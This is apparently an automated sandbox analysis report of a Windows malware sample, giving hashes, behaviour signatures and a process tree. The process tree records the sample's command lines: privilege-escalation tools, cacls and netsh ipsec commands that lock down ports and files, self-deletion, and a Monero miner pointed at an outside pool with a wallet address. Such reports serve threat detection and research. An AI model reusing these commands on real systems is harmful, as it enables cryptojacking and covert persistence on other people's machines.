Analysis
-
max time kernel
124s -
max time network
138s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-05-2021 13:00
Static task
static1
Behavioral task
behavioral1
Sample
tq.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
tq.exe
Resource
win10v20210408
General
-
Target
tq.exe
-
Size
418KB
-
MD5
e8450e61f061fd90d74507eb04845ecd
-
SHA1
f344f20c57f9cb01ea3166f3404336da1519a832
-
SHA256
0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
-
SHA512
d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 2120 created 1896 2120 svchost.exe MS19.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exepid process 1896 MS19.exe 2132 MS20.exe 3928 MSSQLH.exe 3496 RunDllExe.exe 1872 RunDllExe.exe 572 x64.exe 188 wudfhosts.exe -
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Windows\Cursors\wudfhosts.exe upx C:\Windows\Cursors\WUDFhosts.exe upx -
Loads dropped DLL 2 IoCs
Processes:
svchost.exepid process 2024 2056 svchost.exe -
Drops file in System32 directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
RunDllExe.exedescription pid process target process PID 3496 set thread context of 3336 3496 RunDllExe.exe svchost.exe -
Drops file in Windows directory 18 IoCs
Processes:
RunDllExe.exeMSSQLH.exeRunDllExe.exex64.exesvchost.exedescription ioc process File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File created C:\Windows\Logs\Vers.txt MSSQLH.exe File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File opened for modification C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\Logs\RunDllExe.exe MSSQLH.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe File created C:\Windows\Help\active_desktop_render_New.dll svchost.exe File created C:\Windows\Logs\RunDllExe.dll MSSQLH.exe File created C:\Windows\MpMgSvc.dll MSSQLH.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File created C:\Windows\Help\active_desktop_render.dll x64.exe File opened for modification C:\Windows\Help\active_desktop_render.dll svchost.exe File created C:\Windows\Logs\RunDllExe MSSQLH.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
MSSQLH.exesvchost.exepid process 3928 MSSQLH.exe 3928 MSSQLH.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe 1156 svchost.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
MS19.exesvchost.exeMS20.exeMSSQLH.exesvchost.exewudfhosts.exedescription pid process Token: SeImpersonatePrivilege 1896 MS19.exe Token: SeAssignPrimaryTokenPrivilege 1896 MS19.exe Token: SeTcbPrivilege 2120 svchost.exe Token: SeTcbPrivilege 2120 svchost.exe Token: SeImpersonatePrivilege 2132 MS20.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 3928 MSSQLH.exe Token: SeBackupPrivilege 3928 MSSQLH.exe Token: SeSecurityPrivilege 3928 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3928 MSSQLH.exe Token: SeRestorePrivilege 1156 svchost.exe Token: SeBackupPrivilege 1156 svchost.exe Token: SeSecurityPrivilege 1156 svchost.exe Token: SeTakeOwnershipPrivilege 1156 svchost.exe Token: SeLockMemoryPrivilege 188 wudfhosts.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exepid process 1456 tq.exe 3928 MSSQLH.exe 3496 RunDllExe.exe 1872 RunDllExe.exe 572 x64.exe 2056 svchost.exe 1156 svchost.exe 1156 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exedescription pid process target process PID 1456 wrote to memory of 1896 1456 tq.exe MS19.exe PID 1456 wrote to memory of 1896 1456 tq.exe MS19.exe PID 1456 wrote to memory of 2132 1456 tq.exe MS20.exe PID 1456 wrote to memory of 2132 1456 tq.exe MS20.exe PID 1456 wrote to memory of 3928 1456 tq.exe MSSQLH.exe PID 1456 wrote to memory of 3928 1456 tq.exe MSSQLH.exe PID 1456 wrote to memory of 3928 1456 tq.exe MSSQLH.exe PID 3928 wrote to memory of 184 3928 MSSQLH.exe cacls.exe PID 3928 wrote to memory of 184 3928 MSSQLH.exe cacls.exe PID 3928 wrote to memory of 184 3928 MSSQLH.exe cacls.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 1872 wrote to memory of 2916 1872 RunDllExe.exe svchost.exe PID 1872 wrote to memory of 2916 1872 RunDllExe.exe svchost.exe PID 1872 wrote to memory of 2916 1872 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3496 wrote to memory of 3336 3496 RunDllExe.exe svchost.exe PID 3928 wrote to memory of 572 3928 MSSQLH.exe x64.exe PID 3928 wrote to memory of 572 3928 MSSQLH.exe x64.exe PID 3928 wrote to memory of 572 3928 MSSQLH.exe x64.exe PID 572 wrote to memory of 2052 572 x64.exe netsh.exe PID 572 wrote to memory of 2052 572 x64.exe netsh.exe PID 572 wrote to memory of 2052 572 x64.exe netsh.exe PID 572 wrote to memory of 1840 572 x64.exe netsh.exe PID 572 wrote to memory of 1840 572 x64.exe netsh.exe PID 572 wrote to memory of 1840 572 x64.exe netsh.exe PID 572 wrote to memory of 796 572 x64.exe netsh.exe PID 572 wrote to memory of 796 572 x64.exe netsh.exe PID 572 wrote to memory of 796 572 x64.exe netsh.exe PID 572 wrote to memory of 3944 572 x64.exe netsh.exe PID 572 wrote to memory of 3944 572 x64.exe netsh.exe PID 572 wrote to memory of 3944 572 x64.exe netsh.exe PID 572 wrote to memory of 2916 572 x64.exe netsh.exe PID 572 wrote to memory of 2916 572 x64.exe netsh.exe PID 572 wrote to memory of 2916 572 x64.exe netsh.exe PID 572 wrote to memory of 3960 572 x64.exe netsh.exe PID 572 wrote to memory of 3960 572 x64.exe netsh.exe PID 572 wrote to memory of 3960 572 x64.exe netsh.exe PID 572 wrote to memory of 828 572 x64.exe netsh.exe PID 572 wrote to memory of 828 572 x64.exe netsh.exe PID 572 wrote to memory of 828 572 x64.exe netsh.exe PID 572 wrote to memory of 920 572 x64.exe netsh.exe PID 572 wrote to memory of 920 572 x64.exe netsh.exe PID 572 wrote to memory of 920 572 x64.exe netsh.exe PID 572 wrote to memory of 1548 572 x64.exe netsh.exe PID 572 wrote to memory of 1548 572 x64.exe netsh.exe PID 572 wrote to memory of 1548 572 x64.exe netsh.exe PID 572 wrote to memory of 2312 572 x64.exe netsh.exe PID 572 wrote to memory of 2312 572 x64.exe netsh.exe PID 572 wrote to memory of 2312 572 x64.exe netsh.exe PID 572 wrote to memory of 3176 572 x64.exe netsh.exe PID 572 wrote to memory of 3176 572 x64.exe netsh.exe PID 572 wrote to memory of 3176 572 x64.exe netsh.exe PID 572 wrote to memory of 1896 572 x64.exe cmd.exe PID 572 wrote to memory of 1896 572 x64.exe cmd.exe PID 572 wrote to memory of 1896 572 x64.exe cmd.exe PID 2056 wrote to memory of 1156 2056 svchost.exe svchost.exe PID 2056 wrote to memory of 1156 2056 svchost.exe svchost.exe PID 2056 wrote to memory of 1156 2056 svchost.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tq.exe"C:\Users\Admin\AppData\Local\Temp\tq.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeC:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeC:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeC:\Users\Admin\AppData\Local\Temp\MSSQLH.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\*.exe /e /d system3⤵
-
C:\Users\Admin\AppData\Local\Temp\x64.exex64.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"4⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
\??\c:\windows\syswow64\svchost.exec:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Cursors\wudfhosts.exeC:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Cursors\wudfhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Logs\RunDllExeMD5
bbbd6879022d46836d928cd270c92956
SHA18f61cc478b4249216c9c9fe52a79f895bfc71b51
SHA2562eed3384b4f76dd6bd8b42f801af781c7e975d0ce88d590790bc74e4e6e87dd8
SHA512757fbade573c3bd10be86908b5b21dc352898aa90fedd9efddefb14d4e81c4c6f6f8d21c9d17757efca26abe4b28fdf70f3e60aa3b8842327fcf06833bfcc637
-
C:\Windows\Logs\RunDllExeMD5
b2ba3562bf2339fa7a86720ed8c06867
SHA1ab98e9f57bcc115e0f2c31de6ae29ff94354be39
SHA256e19c78f98e76e3efe7971268a3835bb0dd1e8d64aca6f7babf1e398fd3223e26
SHA5126bd6b5eb1969a6d0eacbc69e84e5152c3c3f17958cc662a5115b2aefae8a98d79813dafe66e81df350bf5027a55abdf9e36022b90fa8f1d93fe340b1b1673e5b
-
C:\Windows\Logs\RunDllExe.dllMD5
c68ec95a352a1ae97b9688794880bef2
SHA1cd98f4986f37b562dd4d48547b156a4c740959d4
SHA2567e0239f760a17e27702b2cbcb54f8d675a4da15ced8f60e6cb62fe07fc87ee9b
SHA5123301864fe277fc043afb29ad9d4420628ce1755f388b63fd1762718e72c1d70c6845da3c7326bfe3af429bf619d86e329f9de2f33569c8d933ef59a7f591fa96
-
C:\Windows\Logs\RunDllExe.dllMD5
66299769f3f96cf1a860b5b64f4df173
SHA12738326e2d3a2a8dca7f34a10615686416f11634
SHA256cc292d3e2f6aa009e2bf78819f098fd35cd0111a6bae8cb987bfba9dc507fd9e
SHA5121d7281a3db16277d6bd641992dad386fbe21d616ffe195452d2773f951c0abab2db4b26cfd5f4e2ad4d3251d8a82f74d1e552086dadcea57f871e88c9407b712
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
\??\c:\windows\help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Logs\RunDllExe.dllMD5
c02d9300deea8aaa42bf5e9c56ddcf29
SHA14c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89
SHA25654dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5
SHA512c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1
-
memory/184-127-0x0000000000000000-mapping.dmp
-
memory/188-169-0x0000013626F60000-0x0000013626F70000-memory.dmpFilesize
64KB
-
memory/188-171-0x0000013626F80000-0x0000013626F90000-memory.dmpFilesize
64KB
-
memory/188-170-0x0000013626F70000-0x0000013626F80000-memory.dmpFilesize
64KB
-
memory/188-166-0x0000000000000000-mapping.dmp
-
memory/188-168-0x0000013626F40000-0x0000013626F50000-memory.dmpFilesize
64KB
-
memory/572-140-0x0000000000000000-mapping.dmp
-
memory/796-145-0x0000000000000000-mapping.dmp
-
memory/828-149-0x0000000000000000-mapping.dmp
-
memory/920-150-0x0000000000000000-mapping.dmp
-
memory/1156-157-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/1156-161-0x0000000000000000-mapping.dmp
-
memory/1156-160-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/1156-159-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/1156-158-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/1156-164-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/1548-151-0x0000000000000000-mapping.dmp
-
memory/1840-144-0x0000000000000000-mapping.dmp
-
memory/1896-156-0x0000000000000000-mapping.dmp
-
memory/1896-114-0x0000000000000000-mapping.dmp
-
memory/2052-143-0x0000000000000000-mapping.dmp
-
memory/2132-117-0x0000000000000000-mapping.dmp
-
memory/2312-152-0x0000000000000000-mapping.dmp
-
memory/2916-147-0x0000000000000000-mapping.dmp
-
memory/3176-153-0x0000000000000000-mapping.dmp
-
memory/3336-139-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/3336-134-0x00000000004054EC-mapping.dmp
-
memory/3336-129-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/3336-132-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/3336-128-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/3928-120-0x0000000000000000-mapping.dmp
-
memory/3944-146-0x0000000000000000-mapping.dmp
-
memory/3960-148-0x0000000000000000-mapping.dmp